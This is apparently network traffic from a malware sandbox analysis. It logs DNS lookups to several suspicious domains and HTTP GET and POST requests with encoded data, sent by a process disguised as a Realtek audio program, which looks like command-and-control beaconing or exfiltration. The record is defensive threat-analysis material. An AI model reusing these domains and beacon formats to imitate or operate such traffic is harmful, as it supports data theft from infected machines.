                                                                                        Nov 27, 2024 11:30:15.362309933 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:15.362473965 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:15.366075039 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:15.366127014 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:15.366178036 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:15.701483965 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:15.701533079 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:15.701546907 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:15.701560974 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:15.701702118 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:15.701842070 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:15.701862097 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:15.703969955 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:15.704008102 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:15.704205036 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:15.704245090 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:15.704267025 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:15.704276085 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:15.704372883 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:15.704437017 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:15.704519987 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:15.704554081 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:15.704574108 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:15.704608917 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:15.704684019 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:15.705797911 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:15.706088066 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:16.039540052 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.039657116 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.039668083 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.039779902 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.039877892 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.039887905 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.039917946 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.039927006 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:16.039949894 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.039975882 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:16.040045977 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:16.040087938 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.040113926 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.040138960 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:16.040263891 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.040287018 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.040313959 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:16.040338993 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.040390015 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.040467024 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.040474892 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.040512085 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:16.040558100 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:16.040658951 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:16.040945053 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.041060925 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.041120052 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.041198015 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.041249990 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:16.041379929 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:16.376023054 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.376121998 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.376239061 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.376251936 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.376367092 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.376380920 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.376488924 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:16.376488924 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:16.376509905 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.376523972 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.376569986 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.376668930 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:16.376683950 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.376705885 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.376717091 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.376753092 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.376754999 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.376816988 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:16.376846075 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.376858950 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.376916885 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:16.376962900 CET804976443.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:16.377676964 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:16.377676964 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:16.377724886 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:18.026012897 CET4976480192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:19.042362928 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:19.379925966 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:19.380136967 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:19.382648945 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:19.720134020 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:19.722738981 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:19.722843885 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:19.722918034 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:19.722961903 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:19.723009109 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:19.723076105 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:19.723093033 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:19.723129988 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:19.723191977 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:19.723236084 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:19.723233938 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:19.723499060 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:19.723560095 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:19.724384069 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:19.724666119 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.060621977 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.060638905 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.060801983 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.060861111 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.060899973 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061001062 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061012030 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061084986 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.061105967 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061156034 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061243057 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061295986 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061331987 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.061361074 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.061384916 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061528921 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.061532974 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061577082 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061584949 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061592102 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061599970 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061691046 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061692953 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.061713934 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.061808109 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.061964989 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.062083006 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.062211037 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.062448978 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.398416996 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.398531914 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.398662090 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.398675919 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.398798943 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.398812056 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.398922920 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.399046898 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.399060011 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.399075031 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.399152994 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.399252892 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.399277925 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.399288893 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.399362087 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.399492025 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.399558067 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.399564981 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.399569035 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.399579048 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.399586916 CET804976543.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:20.399799109 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.400012970 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.400686026 CET4976580192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:20.737811089 CET804976543.163.1.110192.168.11.20

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 27, 2024 11:28:56.847572088 CET5855153192.168.11.201.1.1.1
                                                                                        Nov 27, 2024 11:28:57.086736917 CET53585511.1.1.1192.168.11.20
                                                                                        Nov 27, 2024 11:29:12.556411028 CET5054153192.168.11.201.1.1.1
                                                                                        Nov 27, 2024 11:29:12.908915997 CET53505411.1.1.1192.168.11.20
                                                                                        Nov 27, 2024 11:29:27.568911076 CET5034353192.168.11.201.1.1.1
                                                                                        Nov 27, 2024 11:29:27.751832008 CET53503431.1.1.1192.168.11.20
                                                                                        Nov 27, 2024 11:29:41.300121069 CET5962453192.168.11.201.1.1.1
                                                                                        Nov 27, 2024 11:29:41.553572893 CET53596241.1.1.1192.168.11.20
                                                                                        Nov 27, 2024 11:29:55.015789032 CET5275153192.168.11.201.1.1.1
                                                                                        Nov 27, 2024 11:29:55.202625990 CET53527511.1.1.1192.168.11.20
                                                                                        Nov 27, 2024 11:30:09.028322935 CET5123553192.168.11.201.1.1.1
                                                                                        Nov 27, 2024 11:30:09.315347910 CET53512351.1.1.1192.168.11.20
                                                                                        Nov 27, 2024 11:30:25.415615082 CET6523053192.168.11.201.1.1.1
                                                                                        Nov 27, 2024 11:30:25.592617035 CET53652301.1.1.1192.168.11.20
                                                                                        Nov 27, 2024 11:30:39.787247896 CET5162353192.168.11.201.1.1.1
                                                                                        Nov 27, 2024 11:30:40.535511017 CET53516231.1.1.1192.168.11.20

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Nov 27, 2024 11:28:56.847572088 CET192.168.11.201.1.1.10xbf53Standard query (0)www.christinascuties.netA (IP address)IN (0x0001)false
                                                                                        Nov 27, 2024 11:29:12.556411028 CET192.168.11.201.1.1.10x3632Standard query (0)www.techmiseajour.netA (IP address)IN (0x0001)false
                                                                                        Nov 27, 2024 11:29:27.568911076 CET192.168.11.201.1.1.10xc510Standard query (0)www.aktmarket.xyzA (IP address)IN (0x0001)false
                                                                                        Nov 27, 2024 11:29:41.300121069 CET192.168.11.201.1.1.10xc434Standard query (0)www.golivenow.liveA (IP address)IN (0x0001)false
                                                                                        Nov 27, 2024 11:29:55.015789032 CET192.168.11.201.1.1.10x3723Standard query (0)www.iglpg.onlineA (IP address)IN (0x0001)false
                                                                                        Nov 27, 2024 11:30:09.028322935 CET192.168.11.201.1.1.10x20c1Standard query (0)www.1qcczjvh2.autosA (IP address)IN (0x0001)false
                                                                                        Nov 27, 2024 11:30:25.415615082 CET192.168.11.201.1.1.10xec10Standard query (0)www.gk88top.topA (IP address)IN (0x0001)false
                                                                                        Nov 27, 2024 11:30:39.787247896 CET192.168.11.201.1.1.10x2462Standard query (0)www.superiorfencing.netA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Nov 27, 2024 11:28:57.086736917 CET1.1.1.1192.168.11.200xbf53No error (0)www.christinascuties.net74.208.236.156A (IP address)IN (0x0001)false
                                                                                        Nov 27, 2024 11:29:12.908915997 CET1.1.1.1192.168.11.200x3632No error (0)www.techmiseajour.nettechmiseajour.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 27, 2024 11:29:12.908915997 CET1.1.1.1192.168.11.200x3632No error (0)techmiseajour.net84.32.84.32A (IP address)IN (0x0001)false
                                                                                        Nov 27, 2024 11:29:27.751832008 CET1.1.1.1192.168.11.200xc510No error (0)www.aktmarket.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                        Nov 27, 2024 11:29:27.751832008 CET1.1.1.1192.168.11.200xc510No error (0)www.aktmarket.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                                        Nov 27, 2024 11:29:41.553572893 CET1.1.1.1192.168.11.200xc434No error (0)www.golivenow.live66.29.149.46A (IP address)IN (0x0001)false
                                                                                        Nov 27, 2024 11:29:55.202625990 CET1.1.1.1192.168.11.200x3723No error (0)www.iglpg.onlineiglpg.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 27, 2024 11:29:55.202625990 CET1.1.1.1192.168.11.200x3723No error (0)iglpg.online173.201.189.241A (IP address)IN (0x0001)false
                                                                                        Nov 27, 2024 11:30:09.315347910 CET1.1.1.1192.168.11.200x20c1No error (0)www.1qcczjvh2.autos1.1qcczjvh2.autosCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 27, 2024 11:30:09.315347910 CET1.1.1.1192.168.11.200x20c1No error (0)1.1qcczjvh2.autos1hong-fted.pels5zqo.shopCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 27, 2024 11:30:09.315347910 CET1.1.1.1192.168.11.200x20c1No error (0)1hong-fted.pels5zqo.shop1hong.pels5zqo.shopCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 27, 2024 11:30:09.315347910 CET1.1.1.1192.168.11.200x20c1No error (0)1hong.pels5zqo.shop43.163.1.110A (IP address)IN (0x0001)false
                                                                                        Nov 27, 2024 11:30:25.592617035 CET1.1.1.1192.168.11.200xec10No error (0)www.gk88top.top104.21.7.187A (IP address)IN (0x0001)false
                                                                                        Nov 27, 2024 11:30:25.592617035 CET1.1.1.1192.168.11.200xec10No error (0)www.gk88top.top172.67.137.47A (IP address)IN (0x0001)false
                                                                                        Nov 27, 2024 11:30:40.535511017 CET1.1.1.1192.168.11.200x2462No error (0)www.superiorfencing.netsuperiorfencing.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 27, 2024 11:30:40.535511017 CET1.1.1.1192.168.11.200x2462No error (0)superiorfencing.net103.230.159.86A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • www.christinascuties.net
                                                                                        • www.techmiseajour.net
                                                                                        • www.aktmarket.xyz
                                                                                        • www.golivenow.live
                                                                                        • www.iglpg.online
                                                                                        • www.1qcczjvh2.autos

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.11.204974574.208.236.156807176C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 27, 2024 11:28:57.303443909 CET417OUTGET /raea/?wIXhAG=PqKj/8KuIq0WSNkKBtYQxtP5ekYb45s1M43YI/iJd5qBB0feLv8ZTW6bO6iF0HlQbmuDykhZpdeI6maFWjppzEXgG+P+iq4B6j/LVW+OdEFKSgTrNoF3hmw=&67ssp=tVX5mtZ66UVF HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.christinascuties.net
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Nov 27, 2024 11:28:57.521481037 CET770INHTTP/1.1 404 Not Found
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 626
                                                                                        Connection: close
                                                                                        Date: Wed, 27 Nov 2024 10:28:57 GMT
                                                                                        Server: Apache
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.11.204974684.32.84.32807176C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 27, 2024 11:29:13.330559969 CET686OUTPOST /jytl/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.techmiseajour.net
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 203
                                                                                        Origin: http://www.techmiseajour.net
                                                                                        Referer: http://www.techmiseajour.net/jytl/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Data Raw: 77 49 58 68 41 47 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 53 59 74 6b 76 79 37 6d 44 68 2b 33 2b 58 30 4f 6f 34 39 55 43 52 78 68 30 66 2b 32 4f 51 49 48 75 74 4a 79 61 75 55 35 55 51 44 61 65 4c 6d 4b 63 6d 43 34 33 49 4c 31 47 71 72 51 55 4d 4f 4e 72 6f 77 55 75 4f 4f 6f 4b 4e 55 65 6e 52 37 6d 50 6d 6f 67 47 31 34 35 45 55 74 6e 49 4b 5a 79 38 50 33 32 79 6a 6e 68 69 4f 51 75 4a 38 7a 79 62 6d 47 76 69 4e 2b 58 62 57 6a 79 46 45 58 44 37 70 4d 68 78 7a 64 30 6a 4b 79 62 5a 6a 30 65 41 61 44 55 6a 58 57 57 38 6f 2b 69 48 76 4a 6a 79 4c 41 55 56 6d 4f 54 4f 5a 46 50 69 73 67 6d 65 47 59 61 4c 51 3d 3d
                                                                                        Data Ascii: wIXhAG=t4Js6+7a0GL8SYtkvy7mDh+3+X0Oo49UCRxh0f+2OQIHutJyauU5UQDaeLmKcmC43IL1GqrQUMONrowUuOOoKNUenR7mPmogG145EUtnIKZy8P32yjnhiOQuJ8zybmGviN+XbWjyFEXD7pMhxzd0jKybZj0eAaDUjXWW8o+iHvJjyLAUVmOTOZFPisgmeGYaLQ==


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.11.204974784.32.84.32807176C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 27, 2024 11:29:16.272559881 CET706OUTPOST /jytl/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.techmiseajour.net
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 223
                                                                                        Origin: http://www.techmiseajour.net
                                                                                        Referer: http://www.techmiseajour.net/jytl/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Data Raw: 77 49 58 68 41 47 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 54 34 39 6b 74 52 44 6d 50 52 2b 77 69 48 30 4f 79 49 39 51 43 52 74 68 30 61 65 6d 4f 47 34 48 75 49 31 79 62 76 55 35 5a 77 44 61 57 72 6d 31 42 57 43 7a 33 49 48 4c 47 72 6e 51 55 4d 61 4e 72 70 41 55 75 2f 4f 6e 4c 64 55 63 71 78 37 6b 53 57 6f 67 47 31 34 35 45 58 52 42 49 4b 42 79 38 2f 48 32 7a 47 4c 69 71 75 51 74 4f 38 7a 79 66 6d 47 72 69 4e 2f 34 62 55 58 55 46 48 76 44 37 73 77 68 2f 48 70 33 74 4b 79 64 47 7a 31 43 4a 66 32 62 36 57 75 6a 34 71 4c 2f 50 64 74 6c 33 64 4e 4f 49 55 36 33 4e 4b 5a 39 6d 63 5a 4f 63 45 5a 42 57 53 67 77 4b 6a 66 6b 32 4d 66 76 73 35 5a 58 67 55 69 69 57 6f 77 3d
                                                                                        Data Ascii: wIXhAG=t4Js6+7a0GL8T49ktRDmPR+wiH0OyI9QCRth0aemOG4HuI1ybvU5ZwDaWrm1BWCz3IHLGrnQUMaNrpAUu/OnLdUcqx7kSWogG145EXRBIKBy8/H2zGLiquQtO8zyfmGriN/4bUXUFHvD7swh/Hp3tKydGz1CJf2b6Wuj4qL/Pdtl3dNOIU63NKZ9mcZOcEZBWSgwKjfk2Mfvs5ZXgUiiWow=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.11.204974884.32.84.32807176C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 27, 2024 11:29:19.209932089 CET7855OUTPOST /jytl/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.techmiseajour.net
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 7371
                                                                                        Origin: http://www.techmiseajour.net
                                                                                        Referer: http://www.techmiseajour.net/jytl/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
